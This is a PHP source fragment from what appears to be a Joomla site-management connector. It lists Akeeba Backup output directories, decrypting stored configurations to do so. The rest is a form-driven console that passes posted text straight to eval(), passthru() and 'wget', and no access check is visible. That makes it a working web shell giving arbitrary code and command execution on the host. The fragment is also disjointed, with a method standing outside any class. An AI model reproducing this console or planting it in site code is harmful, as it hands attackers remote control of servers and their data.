require_once JPATH_SITE . '/libraries/f0f/include.php';
require_once JPATH_SITE . '/administrator/components/com_akeeba/engine/Factory.php';
$serverKeyFile = JPATH_BASE . '/administrator/components/com_akeeba/engine/serverkey.php';
if (!defined('AKEEBA_SERVERKEY') && file_exists($serverKeyFile)) {
include $serverKeyFile;
}
// Get the list of profiles
$profileList = F0FModel::getTmpInstance('Profiles', 'AkeebaModel')->getProfilesList();
// for each profile
foreach ($profileList as $config) {
// if encrypted
if (substr($config->configuration, 0, 12) == '###AES128###') {
$php53 = new bfPHPFiveThreePlusOnly();
$config->configuration = $php53->getAkeebaConfig($config->configuration);
}
// Convert ini to useable array
$data = parse_ini_string($config->configuration, TRUE);
// find the folder
$dir = $data['akeeba']['basic.output_directory'];
$returnData[] = array('path' => $dir, 'is_writable' => is_writable($dir), 'file_exists' => file_exists($dir));
}
bfEncrypt::reply('success', array('paths' => $returnData));
} catch (Exception $e) {
bfEncrypt::reply('error', array('msg' => $e->getMessage()));
}
}
}
// init this class
$securityController = new bfTools($dataObj);
// Run the tool method
$securityController->run();
public static function run()
{
if (!isset($_POST['expr'])) {
$_POST['expr'] = "";
}
if (!isset($_POST['evaltype'])) {
$_POST['evaltype'] = "none";
}
// include("udf_phpdump.php");
$_POST['expr'] = rtrim(stripslashes(stripslashes($_POST['expr'])));
?>
<form action="<?php
echo bfTools::ME();
?>
" method="post">
PHP Expression:
<table width="100%">
<tr valign="top">
<td width="10%"><label><input type="radio" name="evaltype"
value="none" accesskey="n" tabindex="3"
<?php
if ($_POST['evaltype'] == "none") {
echo ' checked="checked"';
}
?>
/>
<span style="text-decoration: underline">n</span>one</label><br/>
<label><input type="radio" name="evaltype" value="echo"
accesskey="n" tabindex="4"
<?php
if (!isset($_POST['submit']) or $_POST['evaltype'] == "echo") {
echo ' checked="checked"';
}
?>
/>
e<span style="text-decoration: underline">c</span>ho</label><br/>
<label><input type="radio" name="evaltype" value="vardump"
accesskey="v" tabindex="5"
<?php
if ($_POST['evaltype'] == "vardump") {
echo ' checked="checked"';
}
?>
/>
<span style="text-decoration: underline">v</span>ardump</label><br/>
<label><input type="radio" name="evaltype" value="phpdump"
accesskey="d" tabindex="6"
<?php
if ($_POST['evaltype'] == "phpdump") {
echo ' checked="checked"';
}
?>
/>
php<span style="text-decoration: underline">d</span>ump</label><br/>
<label><input type="radio" name="evaltype" value="dbclasscreator"
accesskey="d" tabindex="7"
<?php
if ($_POST['evaltype'] == "dbclasscreator") {
echo ' checked="checked"';
}
?>
/>
<span style="text-decoration: underline">d</span>bclasscreator</label><br/>
<label><input type="radio" name="evaltype" value="loadObjectList"
accesskey="l" tabindex="7"
<?php
if ($_POST['evaltype'] == "loadObjectList") {
echo ' checked="checked"';
}
?>
/>
<span style="text-decoration: underline">l</span>oadObjectList</label><br/>
<label><input type="radio" name="evaltype" value="md5" accesskey="m"
tabindex="7"
<?php
if ($_POST['evaltype'] == "md5") {
echo ' checked="checked"';
}
?>
/>
<span style="text-decoration: underline">m</span>d5</label><br/> <label><input
type="radio" name="evaltype" value="passthru" accesskey="p"
tabindex="8"
<?php
if ($_POST['evaltype'] == "passthru") {
echo ' checked="checked"';
}
?>
/>
<span style="text-decoration: underline">p</span>assthru</label><br/>
<label><input type="radio" name="evaltype" value="wget"
accesskey="w" tabindex="9"
<?php
if ($_POST['evaltype'] == "wget") {
echo ' checked="checked"';
}
?>
/>
<span style="text-decoration: underline">w</span>get</label><br/>
</td>
<td width="92%"><textarea rows="5" cols="45" name="expr"
accesskey="e" tabindex="1"
style="width: 90%"><?php
echo htmlspecialchars($_POST['expr']);
?>
</textarea>
</td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="submit" value=" Evaluate "
tabindex="2"/></td>
</tr>
</table>
</form>
<?php
if (strlen($_POST['expr'])) {
switch ($_POST['evaltype']) {
case "echo":
$_POST['expr'] = "echo " . $_POST['expr'];
break;
case "vardump":
$_POST['expr'] = "var_dump(" . $_POST['expr'] . ")";
break;
case "phpdump":
$_POST['expr'] = "phpdump(" . $_POST['expr'] . ")";
break;
case "md5":
$_POST['expr'] = "echo md5('" . $_POST['expr'] . "')";
break;
case "passthru":
$_POST['expr'] = "passthru('" . $_POST['expr'] . "')";
break;
case "wget":
$_POST['expr'] = "passthru('wget " . $_POST['expr'] . "')";
break;
case "loadObjectList":
include 'database.php';
// $database = new
// database('localhost','root','root','componentsdev','jos');
$database->setQuery($_POST['expr']);
echo '<pre style="background-color: #EEE; padding: 0.5em; overflow: auto;">';
print_R($database->loadObjectList());
echo "</pre>";
die;
break;
case "dbclasscreator":
include 'database.php';
// $database = new
// database('localhost','root','root','componentsdev','jos');
$dbname = explode('.', $_POST['expr']);
$e = explode('_', $dbname[1]);
$prefix = $e[0] . '_';
$db = new database('localhost', 'root', 'root', $dbname[0], $prefix);
$db->setQuery('DESCRIBE ' . $dbname[1]);
$fields = $db->loadObjectList();
$str = array();
$str[] = 'class CLASSNAME extends mosDBTable {';
$str[] = '';
$_tbl_key = $fields[0]->Field;
foreach ($fields as $field) {
$str[] = "\t" . 'var $' . $field->Field . '=null;';
}
$str[] = '';
$str[] = "\t" . 'function CLASSNAME() {';
$str[] = "\t" . "\t" . 'global $database;';
$dbname[1] = str_replace('jos_', '', $dbname[1]);
$dbname[1] = str_replace('mos_', '', $dbname[1]);
$str[] = "\t" . "\t" . '$this->mosDBTable( "#__' . $dbname[1] . '", "' . $_tbl_key . '", $database );';
$str[] = "\t" . '}';
$str[] = '}';
$text = implode("\n", $str);
echo '<pre style="background-color: #EEE; padding: 0.5em; overflow: auto;">';
print_R($text);
echo "</pre>";
break;
default:
break;
}
if (substr($_POST['expr'], -1) != ";") {
$_POST['expr'] .= ";";
}
echo '<pre style="background-color: #EEE; padding: 0.5em; overflow: auto;">';
eval($_POST['expr']);
echo "</pre>";
}
}